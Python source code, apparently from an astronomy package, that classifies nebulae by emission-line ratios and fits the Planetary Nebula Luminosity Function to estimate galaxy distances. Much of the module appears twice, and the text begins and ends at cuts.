''' for uncertainties https://erikbern.com/2018/10/08/the-hackers-guide-to-uncertainty-estimates.html Parameters ---------- func : function PDF of the form `func(data,params)`. `func` must accept a ndarray for `data` and can have any number of additional parameters (at least one). data : ndarray Measured data that are feed into `func`. err : ndarray Error associated with data. prior : function Prior probabilities for the parameters of func. method : algorithm that is used for the minimization. **kwargs additional fixed key word arguments that are passed to func. ''' def __init__(self,func,data,err=None,prior=None,method='Nelder-Mead',**kwargs): #if len(signature(func).parameters)-len(kwargs)!=2: # raise ValueError(f'`func` must have at least one free argument') self.func = func logger.info(f'initialize fitter with {len(data)} data points') self.data = data self.err = err if prior: self.prior = prior self.method = method self.kwargs = kwargs width = 5 size = 1000 idx_low = np.argmin(self.data) idx_high = np.argmax(self.data) if np.any(err): self.grid = np.linspace(self.data[idx_low]-width*self.err[idx_low],self.data[idx_high]+width*self.err[idx_high],size) def prior(self,*args): '''uniform prior''' return 1/len(self.data) def evidence(self,param): '''the evidence is the likelihood of observing the data given the parameter''' # real integration takes way too long #return -np.sum(np.log([quad(lambda x: self.func(x,param,**self.kwargs)*gaussian(x,d,e),d-5*e,d+5*e)[0] for d,e in zip(self.data,self.err)])) if np.any(self.err): ev = [np.trapz(self.func(self.grid,param,**self.kwargs)*gaussian(self.grid,d,e),self.grid) for d,e in zip(self.data,self.err)] return np.sum(np.log(ev)) else: ev = self.func(self.data,param,**self.kwargs) return np.sum(np.log(ev)) def likelihood(self,param): '''the evidence multiplied with some prior''' return -self.evidence(param) - np.log(self.prior(param)) def fit(self,guess): '''use scipy minimize to find the best parameters''' #logger.info(f'searching for best parameters with {len(self.data)} data points') self.result = minimize(self.likelihood,guess,method=self.method) self.x = self.result.x[0] if not self.result.success: raise RuntimeError('fit was not successful') #for name,_x,_dx in zip(list(signature(self.func).parameters)[1:],self.x,self.dx): # print(f'{name} = {_x:.3f} + {_dx[1]:.3f} - {_dx[0]:.3f} ') size = 0.5 self.x_arr = np.linspace(self.x-size,self.x+size,1000) # evidence and likelihood are in log self.evidence_arr = np.exp([self.evidence(_) for _ in self.x_arr]) self.prior_arr = np.array([self.prior(_) for _ in self.x_arr]) self.likelihood_arr = np.exp([-self.likelihood(_) for _ in self.x_arr]) valid = ~np.isnan(self.evidence_arr) & ~np.isnan(self.likelihood_arr) self.evidence_arr /= np.abs(np.trapz(self.evidence_arr[valid],self.x_arr [valid])) self.prior_arr /= np.abs(np.trapz(self.prior_arr[valid],self.x_arr [valid])) self.likelihood_arr /= np.abs(np.trapz(self.likelihood_arr[valid],self.x_arr [valid])) normalization = np.trapz(self.likelihood_arr,self.x_arr ) self.integral = np.array([np.trapz(self.likelihood_arr[self.x_arr<=xp],self.x_arr[self.x_arr<=xp])/normalization for xp in self.x_arr[1:]]) # 1 sigma interval for cumulative likelihood self.mid = np.argmin(np.abs(self.integral-0.5)) self.high = np.argmin(np.abs(self.integral-0.8415)) self.low = np.argmin(np.abs(self.integral-0.1585)) self.plus = self.x_arr[self.high]-self.x self.minus = self.x-self.x_arr[self.low] #logger.info(f'{self.x:.3f}+{self.plus:.3f}-{self.minus:.3f}') return self.x,self.plus,self.minus def bootstrap(self,guess,N_boot=100): '''use bootstraping to estinate the uncertainties''' loglike = lambda param,data: -np.sum(np.log(self.func(data,param,**self.kwargs))) result_bootstrap = np.zeros((N_boot)) for i in range(N_boot): sample = np.random.choice(self.data,len(self.data)) result_bootstrap[i] = minimize(loglike,guess,args=(sample),method=self.method).x[0] return np.mean(result_bootstrap),np.std(result_bootstrap) def plot(self,limits=[]): '''plot the likelihood plot the evidence, prior and likelihood for the given data over some parameters space. ''' if not hasattr(self,'x'): logger.warning('run fit function first. I do it for you this time.') x,dp,dm=self.fit(28) else: x,dp,dm = self.x,self.plus,self.minus fig, (ax1,ax2) = subplots(nrows=2,ncols=1,figsize=(single_column,single_column),sharex=True) #fig = figure(figsize=(single_column,single_column)) #ax1 = fig.add_subplot(2,1,1) #ax2 = fig.add_subplot(2,1,2,sharex=ax1) ax1.tick_params(labelbottom=False) ax1.plot(self.x_arr,self.prior_arr,label='prior',color=tab10[1]) ax1.plot(self.x_arr,self.evidence_arr,label='evidence',color=tab10[0]) l = ax1.plot(self.x_arr,self.likelihood_arr,label='likelihood',color=tab10[2]) ax1.axvline(self.x,ls='--',c='k',lw=0.5) ax1.axvline(self.x_arr[self.low],ls='--',c='k',lw=0.5) ax1.axvline(self.x_arr[self.high],ls='--',c='k',lw=0.5) ax1.set_ylabel('likelihood') ax2.plot(self.x_arr[1:],self.integral,label='cumulative likelihood',color=tab10[2]) ax2.axvline(self.x,ls='--',c='k',lw=0.5) ax2.axhline(0.5,ls='--',c='k',lw=0.5) ax2.axhline(0.5+0.683/2,ls='--',c='k',lw=0.5) ax2.axhline(0.5-0.683/2,ls='--',c='k',lw=0.5) ax2.axvline(self.x_arr[self.low],ls='--',c='k',lw=0.5) ax2.axvline(self.x_arr[self.high],ls='--',c='k',lw=0.5) ax1.legend() ax2.set_xlabel(r'$(m-M)$ / mag') ax2.set_ylabel('cumulative likelihood') if limits: ax1.set(xlim=limits) ax2.set(xlim=limits) ax1.set_title(f'{self.x:.3f}+{dp:.3f}-{dm:.3f}') ax1.annotate(f'{len(self.data)} data points',(0.02,0.87),xycoords='axes fraction',fontsize=8) plt.subplots_adjust(hspace = .001) return fig def __call__(self,guess): '''use scipy minimize to find the best parameters''' return self.fit(guess) def f(m,mu,Mmax=-4.47): '''luminosity function (=density)''' return np.exp(0.307*(m-mu)) * (1-np.exp(3*(Mmax-m+mu))) def F(m,mu,Mmax=-4.47): '''indefinite integral of the luminosity function''' #return np.exp(-0.307*mu) * (np.exp(0.307*m)/0.307 + np.exp(3*(Mmax-mu)-2.693*m) / 2.693) return np.exp(0.307*(m-mu))/0.307 + np.exp(2.693*(mu-m)+3*Mmax)/2.693 def pnlf(m,mu,mhigh,Mmax=-4.47): '''Planetary Nebula Luminosity Function (PNLF) N(m) ~ e^0.307(m-mu) * (1-e^3(Mmax-m+mu)) The normalization is calculated by integrating from Mmax+mu (the root of the function) to the specified completeness. Objects that lie outside this intervall are ignored. Parameters ---------- m : ndarray apparent magnitudes of the PNs mu : float distance modulus mhigh : float completeness level (magnitude of the faintest sources that are consistently detected). Required for normalization. ''' m = np.atleast_1d(m) mlow = Mmax+mu normalization = 1/(F(mhigh,mu) - F(mlow,mu)) out = normalization * np.exp(0.307*(m-mu)) * (1-np.exp(3*(Mmax-m+mu))) out[(m>mhigh) | (m<mlow)] = 0 return out def PNLF(bins,mu,mhigh,Mmax=-4.47): '''integrated Planetary Nebula Luminosity Function Parameters ---------- bins : ndarray Defines a monotonically increasing array of bin edges. mu : float Distance modulus mhigh : float completness level (magnitude of the faintest sources that are consistently detected). Required for normalization. Mmax : float Magnitude of the brightest PN. ''' mlow = mu+Mmax lower = bins[:-1] upper = bins[1:] normalization = 1/(F(mhigh,mu,Mmax=Mmax)-F(mlow,mu,Mmax=Mmax)) #out = normalization * (np.exp(2.693*mu + 3.*Mmax) * (-0.371333/np.exp(2.693*lower)) + 0.371333/np.exp(2.693*upper)) + (-3.25733*np.exp(0.307*lower) + 3.25733*np.exp(0.307*upper))/np.exp(0.307*mu) out = normalization * (F(upper,mu,Mmax=Mmax) - F(lower,mu,Mmax=Mmax)) out[out<0] = 0 return out def cdf(x,mu,mhigh,Mmax = -4.47): '''Cumulative distribution function for PNe''' mlow = mu+Mmax normalization = 1/(F(mhigh,mu,Mmax=Mmax)-F(mlow,mu,Mmax=Mmax)) out = normalization * (F(x,mu,Mmax=Mmax) - F(mlow,mu,Mmax=Mmax)) out[x<mlow] = 0 out[x>mhigh] = 1 return out def sample_pnlf(size,mu,cl): Nbins = 1000 x =np.linspace(mu-4.47,cl,Nbins) cdf = np.cumsum(pnlf(x,mu,cl))*(cl-mu+4.47)/Nbins u = np.random.uniform(size=size) return np.interp(u,cdf,x) ''' from scipy.stats import ks_2samp from pnlf.analyse import sample_pnlf sampled_data = sample_pnlf(10000,galaxy.mu,galaxy.completeness_limit) ks,pv = ks_2samp(data,sampled_data) print(f'statistic={ks:.3f}, pvalue={pv:.3f}') ''' def prior(mu): mu0 = 29.91 std = 0.13 return 1 / (std*np.sqrt(2*np.pi)) * np.exp(-(mu-mu0)**2 / (2*std**2)) def N25(mu,completeness,data,deltaM): '''calculate the number of PN within deltaM the cutoff of the luminosity function is at mu-4.47. Step1: number of PN in data between cutoff and completeness Step2: calculate same number from theoretical function Step3: calculate theoreticla number betwenn cutoff and deltaM Step4: Scale number from Step1 with results from Step 2 and 3 Parameters ---------- mu : float distance modulus completeness : float completeness limit (upper limit for PNLF). Used for normalization data : ndarray array of magnitudes deltaM : float Interval above the cutoff ''' cutoff = mu - 4.47 N_total = len(data[data<completeness]) p_deltaM = (F(cutoff+deltaM,mu) - F(cutoff,mu)) / (F(completeness,mu) - F(cutoff,mu)) return N_total * p_deltaM from scipy.optimize import minimize def estimate_uncertainties_from_SII(tbl,plot=False): ''' The uncertainties in the PHANGS-MUSE DAP products are somewhat underestimated. To get a better handle on the errors, we use that the SII6716/SII6730 ratio should theoretically be 1.4484. Any diviation from this value can be attributed to the errors in the measurements. We divide the diviation by the error of the ratio. This should follow a gaussian with width 1. From the actuall width of the distribution we can estimate the real uncertainty of the data. to use Francescos catalogue instead: ``` with fits.open(data_ext/'Products'/'Nebulae catalogue' / 'Nebulae_catalogue_v2.fits') as hdul: nebulae = Table(hdul[1].data) nebulae['gal_name'][nebulae['gal_name']=='NGC628'] = 'NGC0628' nebulae = nebulae[(nebulae["flag_edge"] == 0) & (nebulae["flag_star"] == 0) & (nebulae["BPT_NII"] == 0) & (nebulae["BPT_SII"] == 0) & (nebulae["BPT_OI"] == 0) & (nebulae['HA6562_SIGMA'] < 100)] nebulae.rename_columns(['SII6730_FLUX','SII6730_FLUX_ERR','SII6716_FLUX','SII6716_FLUX_ERR'],['SII6730','SII6730_err','SII6716','SII6716_err']) nebulae['type'] = 'HII' ``` ''' if tbl is None: from astropy.io import fits with fits.open(Path('a:') /'MUSE_DR2' /'Nebulae catalogue' / 'Nebulae_Catalogue_DR2_native.fits') as hdul: tbl = Table(hdul[1].data) tbl['gal_name'][tbl['gal_name']=='NGC628'] = 'NGC0628' tbl = tbl[(tbl["flag_edge"] == 0) & (tbl["flag_star"] == 0) & (tbl["BPT_NII"] == 0) & (tbl["BPT_SII"] == 0) & (tbl["BPT_OI"] == 0) & (tbl['HA6562_SIGMA'] < 100)] tbl.rename_columns(['SII6730_FLUX','SII6730_FLUX_ERR','SII6716_FLUX','SII6716_FLUX_ERR'],['SII6730','SII6730_err','SII6716','SII6716_err']) tbl['type'] = 'HII' tmp = tbl[(tbl['type']=='HII') & (tbl['SII6730']>0) & (tbl['SII6716']>0)] logger.info(f'sample contains {len(tmp)} nebulae') ratio = tmp['SII6716'] / tmp['SII6730'] ratio_err = ratio * np.sqrt((tmp['SII6716_err']/tmp['SII6716'])**2+(tmp['SII6730_err']/tmp['SII6730'])**2) diff_norm = (ratio-1.4484) / ratio_err diff_norm = diff_norm[diff_norm>0] gauss = lambda x,mu,std: 1/np.sqrt(2* np.pi*std**2) * np.exp(-0.5 * ((x - mu) / std)**2) log_likelihood = lambda std,x: - np.sum(np.log(gauss(x,0,std))) std = minimize(log_likelihood,[1],args=(diff_norm,)).x[0] if plot: fig, ax = plt.subplots(figsize=(4,3)) hist, bins, patches = ax.hist((ratio-1.4484) / ratio_err,bins=20,range=(0,6),color='silver') y2 = gauss(bins,0,1) ax.plot(bins,hist[0]/y2[0]*y2, '--',label='std=1',color='tab:blue') y = gauss(bins,0,std) ax.plot(bins,hist[0]/y[0]*y, '--',label=f'std={std:.2f}',color='tab:red') ax.legend() ax.set(xlabel="Deviation / Error",ylabel="Number of regions",yscale='log',ylim=[1,1.5*hist[0]]) plt.show() logger.info(f'std={std:.3f}') return std
import logging # use instead of print for more control from pathlib import Path # filesystem related stuff import numpy as np # numerical computations from matplotlib.pyplot import subplots, figure, savefig import matplotlib.pyplot as plt from astropy.stats import sigma_clipped_stats # calcualte statistics of images from astropy.table import Table from scipy.optimize import minimize from scipy.integrate import quad from inspect import signature from .constants import single_column,two_column,tab10 from .old import MaximumLikelihood logger = logging.getLogger(__name__) def emission_line_diagnostics(table,distance_modulus,completeness_limit,distance_modulus_err=0.1,detection_limit=5): '''Classify objects based on their emission lines we use four criteria to distinguish between PN, HII regions and SNR: criteria1 -> emperical upper limit (currently not used) 4 > log10 [OIII] / (Ha +[NII]) criteria2 -> HII regions log10 [OIII] / (Ha +[NII]) > -0.37 M[OIII] - 1.16 criteria3 -> SNR Ha / [SII] < 2.5 criteria4 -> velocity dispersion The second criteria requires the absolute magnitude of the objects. Therefor the distance_modulus is needed as an input to this function Parameters ---------- table : Astropy Table Table with measured fluxes completeness_limit : float Sources fainter than this magnitude are ignored distance_modulus : float A first guess of the distance modulus (used for diagnostics) distance_modulus = m - M detection_limit : float how many sigma are needed for a detection (default=3). Non detections are set to detection_limit*uncertainty. Returns ------- table : Astropy Table The input table with an additional column, indicating the type of the object ''' # we don't want to modift the original input table table = table.copy() logger.info(f'{len(table)} entries in initial catalogue') logger.info(f'using mu={distance_modulus:.2f}, cl={completeness_limit}') # make sure that the new column can save strings with 3 characters # we start with the assumption that all sources are PN and remove contaminants later table['type'] = np.empty(len(table),dtype='U3') table['type'][:] = 'PN' # calculate the absolute magnitude based on a first estimate of the distance modulus table['MOIII'] = table['mOIII'] - distance_modulus table['dMOIII'] = np.sqrt(table['dmOIII']**2 + distance_modulus_err**2) # we need the the sum of the [SII] lines for the SNR criteria table['SII_flux'] = table['SII6716_flux']+table['SII6730_flux'] table['SII_flux_err'] = np.sqrt(table['SII6716_flux_err']**2+table['SII6730_flux_err']**2) # we set negative fluxes and none detections to th error (0 would cause errors because we work with ratios) for col in ['HB4861','OIII5006','HA6562','NII6583','SII']: detection = (table[f'{col}_flux']>0) & (table[f'{col}_flux']>detection_limit*table[f'{col}_flux_err']) table[f'{col}_flux'][np.where(~detection)] = table[f'{col}_flux_err'][np.where(~detection)] table[f'{col}_detection'] = detection # calculate velocity dispersion (use line with best signal to noise) table['OIII5006_S/N'] = table['OIII5006_flux']/table['OIII5006_flux_err'] table['HA6562_S/N'] = table['HA6562_flux']/table['HA6562_flux_err'] table['SII_S/N'] = table['SII_flux']/table['SII_flux_err'] # we use the Halpha velocity dispersion. the others can behave funny table['v_SIGMA'] = table['HA6562_SIGMA'] table['v_SIGMA_S/N'] = table['HA6562_S/N'] #table['v_SIGMA'][np.where(table['HA6562_SIGMA']/table['HA6562_SIGMA_ERR']>table['v_SIGMA_S/N'] )] = table['HA6562_SIGMA'][np.where(table['HA6562_SIGMA']/table['HA6562_SIGMA_ERR']>table['v_SIGMA_S/N'] )] #table['v_SIGMA_S/N'][np.where(table['HA6562_SIGMA']/table['HA6562_SIGMA_ERR']>table['v_SIGMA_S/N'] )] = table['HA6562_S/N'][np.where(table['HA6562_SIGMA']/table['HA6562_SIGMA_ERR']>table['v_SIGMA_S/N'] )] #table['v_SIGMA'][np.where(table['SII6716_SIGMA']/table['SII6716_SIGMA_ERR']>table['v_SIGMA_S/N'])] = table['SII6716_SIGMA'][np.where(table['SII6716_SIGMA']/table['SII6716_SIGMA_ERR']>table['v_SIGMA_S/N'] )] #table['v_SIGMA_S/N'][table['SII6716_SIGMA']/table['SII6716_SIGMA_ERR']>table['v_SIGMA_S/N'] )] = table['SII_S/N'][np.where(table['SII6716_SIGMA']/table['SII6716_SIGMA_ERR']>table['v_SIGMA_S/N'] )] #logger.info('v_sigma: median={:.2f}, median={:.2f}, sig={:.2f}'.format(*sigma_clipped_stats(table['v_SIGMA'][~np.isnan(table['v_SIGMA'])]))) # define ratio of OIII to Halpha and NII for the first criteria (with error). If NII is not detected we assume NII=0.5Halpha table['logR'] = np.log10(table['OIII5006_flux'] / (table['HA6562_flux']+table['NII6583_flux'])) table['logR'][~table['NII6583_detection']] = np.log10(table['OIII5006_flux'][~table['NII6583_detection']] / (1.5*table['HA6562_flux'][~table['NII6583_detection']])) table['dlogR'] = np.sqrt((table['OIII5006_flux_err'] / table['OIII5006_flux'])**2 + (table['HA6562_flux_err'] / (table['HA6562_flux']+table['NII6583_flux']))**2 + (table['NII6583_flux_err'] / (table['HA6562_flux']+table['NII6583_flux']))**2) /np.log(10) # define criterias to exclude non PN objects criteria = {} if True: # this criteria should be log(4) which would remove a lot of objects. no idea why so many objects have such high line ratios #criteria[''] = (np.log10(4) < (table['R'])) #& (table['HA6562_detection']) criteria['HII'] = (table['logR'] < -0.37*(table['MOIII']+table['dMOIII']) - 1.16) & (table['HA6562_detection']) criteria['SNR'] = (table['HA6562_flux']/table['SII_flux'] < 2.5) & (table['SII_detection']) elif True: # here we retain things in the sample if they are within 1 sigma #criteria[''] = (4 < (table['R']- 3*table['dR'])) #& (table['HA6562_detection']) criteria['HII'] = (table['logR'] + table['dlogR'] < -0.37*(table['MOIII']+table['dmOIII']) - 1.16) #& (table['HA6562_detection'] | table['NII6583_detection']) HAoverSII = table['HA6562_flux']/table['SII_flux'] HAoverSII_err = HAoverSII * np.sqrt((table['HA6562_flux_err']/table['HA6562_flux'])**2 + (table['SII_flux_err']/table['SII_flux'])**2) criteria['SNR'] = ((HAoverSII + HAoverSII_err) < 2.5) else: # use HB as a criteria (because this line is close to OIII, extinction should not be an issue) criteria['HII'] = (np.log10(table['OIII5006'] / table['HB4861']) < -0.37*table['MOIII'] - 0.71) & table['HB4861_detection'] #criteria['SNR'] |= (table['v_SIGMA']>100) & table['SII_detection'] # objects that would be classified as PN by narrowband observations table['SNRorPN'] = criteria['SNR'] & ~criteria['HII'] for k in criteria.keys(): table['type'][np.where(criteria[k])] = k # remove rows with NaN values in some columns mask = np.ones(len(table), dtype=bool) for col in ['HB4861_flux','OIII5006_flux','HA6562_flux','NII6583_flux','SII_flux']: mask &= ~np.isnan(table[col]) table['type'][np.where(~mask)] = 'NaN' # purely for information mask = table['mOIII']< completeness_limit logger.info(f'{np.sum(~mask)} objects below the completness limit of {completeness_limit}') logger.info(f'{len(table[table["type"]==""])} objects classified as 4<log [OIII]/Ha') logger.info(f'{len(table[table["type"]=="HII"])} ({len(table[(table["type"]=="HII") & (table["mOIII"]<completeness_limit)])}) objects classified as HII') logger.info(f'{len(table[table["type"]=="SNR"])} ({len(table[(table["type"]=="SNR") & (table["mOIII"]<completeness_limit)])}) objects classified as SNR') logger.info(f'{len(table[table["type"]=="PN"])} ({len(table[(table["type"]=="PN") & (table["mOIII"]<completeness_limit)])}) objects classified as PN') return table def gaussian(x,mu,sig): return 1/np.sqrt(2*np.pi*sig**2) * np.exp(-(x-mu)**2/(2*sig**2)) class MaximumLikelihood1D: ''' for uncertainties https://erikbern.com/2018/10/08/the-hackers-guide-to-uncertainty-estimates.html Parameters ---------- func : function PDF of the form `func(data,params)`. `func` must accept a ndarray for `data` and can have any number of additional parameters (at least one). data : ndarray Measured data that are feed into `func`. err : ndarray Error associated with data. prior : function Prior probabilities for the parameters of func. method : algorithm that is used for the minimization. **kwargs additional fixed key word arguments that are passed to func. ''' def __init__(self,func,data,err=None,prior=None,method='Nelder-Mead',**kwargs): #if len(signature(func).parameters)-len(kwargs)!=2: # raise ValueError(f'`func` must have at least one free argument') self.func = func logger.info(f'initialize fitter with {len(data)} data points') self.data = data self.err = err if prior: self.prior = prior self.method = method self.kwargs = kwargs width = 5 size = 1000 idx_low = np.argmin(self.data) idx_high = np.argmax(self.data) if np.any(err): self.grid = np.linspace(self.data[idx_low]-width*self.err[idx_low],self.data[idx_high]+width*self.err[idx_high],size) def prior(self,*args): '''uniform prior''' return 1/len(self.data) def evidence(self,param): '''the evidence is the likelihood of observing the data given the parameter''' # real integration takes way too long #return -np.sum(np.log([quad(lambda x: self.func(x,param,**self.kwargs)*gaussian(x,d,e),d-5*e,d+5*e)[0] for d,e in zip(self.data,self.err)])) if np.any(self.err): ev = [np.trapz(self.func(self.grid,param,**self.kwargs)*gaussian(self.grid,d,e),self.grid) for d,e in zip(self.data,self.err)] return np.sum(np.log(ev)) else: ev = self.func(self.data,param,**self.kwargs) return np.sum(np.log(ev)) def likelihood(self,param): '''the evidence multiplied with some prior''' return -self.evidence(param) - np.log(self.prior(param)) def fit(self,guess): '''use scipy minimize to find the best parameters''' #logger.info(f'searching for best parameters with {len(self.data)} data points') self.result = minimize(self.likelihood,guess,method=self.method) self.x = self.result.x[0] if not self.result.success: raise RuntimeError('fit was not successful') #for name,_x,_dx in zip(list(signature(self.func).parameters)[1:],self.x,self.dx): # print(f'{name} = {_x:.3f} + {_dx[1]:.3f} - {_dx[0]:.3f} ') size = 0.5 self.x_arr = np.linspace(self.x-size,self.x+size,1000) # evidence and likelihood are in log self.evidence_arr = np.exp([self.evidence(_) for _ in self.x_arr]) self.prior_arr = np.array([self.prior(_) for _ in self.x_arr]) self.likelihood_arr = np.exp([-self.likelihood(_) for _ in self.x_arr]) valid = ~np.isnan(self.evidence_arr) & ~np.isnan(self.likelihood_arr) self.evidence_arr /= np.abs(np.trapz(self.evidence_arr[valid],self.x_arr [valid])) self.prior_arr /= np.abs(np.trapz(self.prior_arr[valid],self.x_arr [valid])) self.likelihood_arr /= np.abs(np.trapz(self.likelihood_arr[valid],self.x_arr [valid])) normalization = np.trapz(self.likelihood_arr,self.x_arr ) self.integral = np.array([np.trapz(self.likelihood_arr[self.x_arr<=xp],self.x_arr[self.x_arr<=xp])/normalization for xp in self.x_arr[1:]]) # 1 sigma interval for cumulative likelihood self.mid = np.argmin(np.abs(self.integral-0.5)) self.high = np.argmin(np.abs(self.integral-0.8415)) self.low = np.argmin(np.abs(self.integral-0.1585)) self.plus = self.x_arr[self.high]-self.x self.minus = self.x-self.x_arr[self.low] #logger.info(f'{self.x:.3f}+{self.plus:.3f}-{self.minus:.3f}') return self.x,self.plus,self.minus def bootstrap(self,guess,N_boot=100): '''use bootstraping to estinate the uncertainties''' loglike = lambda param,data: -np.sum(np.log(self.func(data,param,**self.kwargs))) result_bootstrap = np.zeros((N_boot)) for i in range(N_boot): sample = np.random.choice(self.data,len(self.data)) result_bootstrap[i] = minimize(loglike,guess,args=(sample),method=self.method).x[0] return np.mean(result_bootstrap),np.std(result_bootstrap) def plot(self,limits=[]): '''plot the likelihood plot the evidence, prior and likelihood for the given data over some parameters space. ''' if not hasattr(self,'x'): logger.warning('run fit function first. I do it for you this time.') x,dp,dm=self.fit(28) else: x,dp,dm = self.x,self.plus,self.minus fig, (ax1,ax2) = subplots(nrows=2,ncols=1,figsize=(single_column,single_column),sharex=True) #fig = figure(figsize=(single_column,single_column)) #ax1 = fig.add_subplot(2,1,1) #ax2 = fig.add_subplot(2,1,2,sharex=ax1) ax1.tick_params(labelbottom=False) ax1.plot(self.x_arr,self.prior_arr,label='prior',color=tab10[1]) ax1.plot(self.x_arr,self.evidence_arr,label='evidence',color=tab10[0]) l = ax1.plot(self.x_arr,self.likelihood_arr,label='likelihood',color=tab10[2]) ax1.axvline(self.x,ls='--',c='k',lw=0.5) ax1.axvline(self.x_arr[self.low],ls='--',c='k',lw=0.5) ax1.axvline(self.x_arr[self.high],ls='--',c='k',lw=0.5) ax1.set_ylabel('likelihood') ax2.plot(self.x_arr[1:],self.integral,label='cumulative likelihood',color=tab10[2]) ax2.axvline(self.x,ls='--',c='k',lw=0.5) ax2.axhline(0.5,ls='--',c='k',lw=0.5) ax2.axhline(0.5+0.683/2,ls='--',c='k',lw=0.5) ax2.axhline(0.5-0.683/2,ls='--',c='k',lw=0.5) ax2.axvline(self.x_arr[self.low],ls='--',c='k',lw=0.5) ax2.axvline(self.x_arr[self.high],ls='--',c='k',lw=0.5) ax1.legend() ax2.set_xlabel(r'$(m-M)$ / mag') ax2.set_ylabel('cumulative likelihood') if limits: ax1.set(xlim=limits) ax2.set(xlim=limits) ax1.set_title(f'{self.x:.3f}+{dp:.3f}-{dm:.3f}') ax1.annotate(f'{len(self.data)} data points',(0.02,0.87),xycoords='axes fraction',fontsize=8) plt.subplots_adjust(hspace = .001) return fig def __call__(self,guess): '''use scipy minimize to find the best parameters''' return self.fit(guess) def f(m,mu,Mmax=-4.47): '''luminosity function (=density)''' return np.exp(0.307*(m-mu)) * (1-np.exp(3*(Mmax-m+mu))) def F(m,mu,Mmax=-4.47): '''indefinite integral of the luminosity function''' #return np.exp(-0.307*mu) * (np.exp(0.307*m)/0.307 + np.exp(3*(Mmax-mu)-2.693*m) / 2.693) return np.exp(0.307*(m-mu))/0.307 + np.exp(2.693*(mu-m)+3*Mmax)/2.693 def pnlf(m,mu,mhigh,Mmax=-4.47): '''Planetary Nebula Luminosity Function (PNLF) N(m) ~ e^0.307(m-mu) * (1-e^3(Mmax-m+mu)) The normalization is calculated by integrating from Mmax+mu (the root of the function) to the specified completeness. Objects that lie outside this intervall are ignored. Parameters ---------- m : ndarray apparent magnitudes of the PNs mu : float distance modulus mhigh : float completeness level (magnitude of the faintest sources that are consistently detected). Required for normalization. ''' m = np.atleast_1d(m) mlow = Mmax+mu normalization = 1/(F(mhigh,mu) - F(mlow,mu)) out = normalization * np.exp(0.307*(m-mu)) * (1-np.exp(3*(Mmax-m+mu))) out[(m>mhigh) | (m<mlow)] = 0 return out def PNLF(bins,mu,mhigh,Mmax=-4.47): '''integrated Planetary Nebula Luminosity Function Parameters ---------- bins : ndarray Defines a monotonically increasing array of bin edges. mu : float Distance modulus mhigh : float completness level (magnitude of the faintest sources that are consistently detected). Required for normalization. Mmax : float Magnitude of the brightest PN. ''' mlow = mu+Mmax lower = bins[:-1] upper = bins[1:] normalization = 1/(F(mhigh,mu,Mmax=Mmax)-F(mlow,mu,Mmax=Mmax)) #out = normalization * (np.exp(2.693*mu + 3.*Mmax) * (-0.371333/np.exp(2.693*lower)) + 0.371333/np.exp(2.693*upper)) + (-3.25733*np.exp(0.307*lower) + 3.25733*np.exp(0.307*upper))/np.exp(0.307*mu) out = normalization * (F(upper,mu,Mmax=Mmax) - F(lower,mu,Mmax=Mmax)) out[out<0] = 0 return out def cdf(x,mu,mhigh,Mmax = -4.47): '''Cumulative distribution function for PNe''' mlow = mu+Mmax normalization = 1/(F(mhigh,mu,Mmax=Mmax)-F(mlow,mu,Mmax=Mmax)) out = normalization * (F(x,mu,Mmax=Mmax) - F(mlow,mu,Mmax=Mmax)) out[x<mlow] = 0 out[x>mhigh] = 1 return out def sample_pnlf(size,mu,cl): Nbins = 1000 x =np.linspace(mu-4.47,cl,Nbins) cdf = np.cumsum(pnlf(x,mu,cl))*(cl-mu+4.47)/Nbins u = np.random.uniform(size=size) return np.interp(u,cdf,x) ''' from scipy.stats import ks_2samp from pnlf.analyse import sample_pnlf sampled_data = sample_pnlf(10000,galaxy.mu,galaxy.completeness_limit) ks,pv = ks_2samp(data,sampled_data) print(f'statistic={ks:.3f}, pvalue={pv:.3f}') ''' def prior(mu): mu0 = 29.91 std = 0.13 return 1 / (std*np.sqrt(2*np.pi)) * np.exp(-(mu-mu0)**2 / (2*std**2)) def N25(mu,completeness,data,deltaM): '''calculate the number of PN within deltaM the cutoff of the luminosity function is at mu-4.47. Step1: number of PN in data between cutoff and completeness Step2: calculate same number from theoretical function Step3: calculate theoreticla number betwenn cutoff and deltaM Step4: Scale number from Step1 with results from Step 2 and 3 Parameters ---------- mu : float distance modulus completeness : float completeness limit (upper limit for PNLF). Used for normalization data : ndarray array of magnitudes deltaM : float Interval above the cutoff ''' cutoff = mu - 4.47 N_total = len(data[data<completeness]) p_deltaM = (F(cutoff+deltaM,mu) - F(cutoff,mu)) / (F(completeness,mu) - F(cutoff,mu)) return N_total * p_deltaM from scipy.optimize import minimize def estimate_uncertainties_from_SII(tbl,plot=False): ''' The uncertainties in the PHANGS-MUSE DAP products are somewhat underestimated. To get a better handle on the errors, we use that the SII6716/SII6730 ratio should theoretically be 1.4484. Any diviation from this value can be attributed to the errors in the measurements. We divide the diviation by the error of the ratio. This should follow a gaussian with width 1. From the actuall width of the distribution we can estimate the real uncertainty of the data. to use Francescos catalogue instead: ``` with fits.open(data_ext/'Products'/'Nebulae catalogue' / 'Nebulae_catalogue_v2.fits') as hdul: nebulae = Table(hdul[1].data) nebulae['gal_name'][nebulae['gal_name']=='NGC628'] = 'NGC0628' nebulae = nebulae[(nebulae["flag_edge"] == 0) & (nebulae["flag_star"] == 0) & (nebulae["BPT_NII"] == 0) & (nebulae["BPT_SII"] == 0) & (nebulae["BPT_OI"] == 0) & (nebulae['HA6562_SIGMA'] < 100)] nebulae.rename_columns(['SII6730_FLUX','SII6730_FLUX_ERR','SII6716_FLUX','SII6716_FLUX_ERR'],['SII6730','SII6730_err','SII6716','SII6716_err']) nebulae['type'] = 'HII' ``` ''' if tbl is None: from astropy.io import fits with fits.open(Path('a:') /'MUSE_DR2' /'Nebulae catalogue' / 'Nebulae_Catalogue_DR2_native.fits') as hdul: tbl = Table(hdul[1].data) tbl['gal_name'][tbl['gal_name']=='NGC628'] = 'NGC0628' tbl = tbl[(tbl["flag_edge"] == 0) & (tbl["flag_star"] == 0) & (tbl["BPT_NII"] == 0) & (tbl["BPT_SII"] == 0) & (tbl["BPT_OI"] == 0) & (tbl['HA6562_SIGMA'] < 100)] tbl.rename_columns(['SII6730_FLUX','SII6730_FLUX_ERR','SII6716_FLUX','SII6716_FLUX_ERR'],['SII6730','SII6730_err','SII6716','SII6716_err']) tbl['type'] = 'HII' tmp = tbl[(tbl['type']=='HII') & (tbl['SII6730']>0) & (tbl['SII6716']>0)] logger.info(f'sample contains {len(tmp)} nebulae') ratio = tmp['SII6716'] / tmp['SII6730'] ratio_err = ratio * np.sqrt((tmp['SII6716_err']/tmp['SII6716'])**2+(tmp['SII6730_err']/tmp['SII6730'])**2) 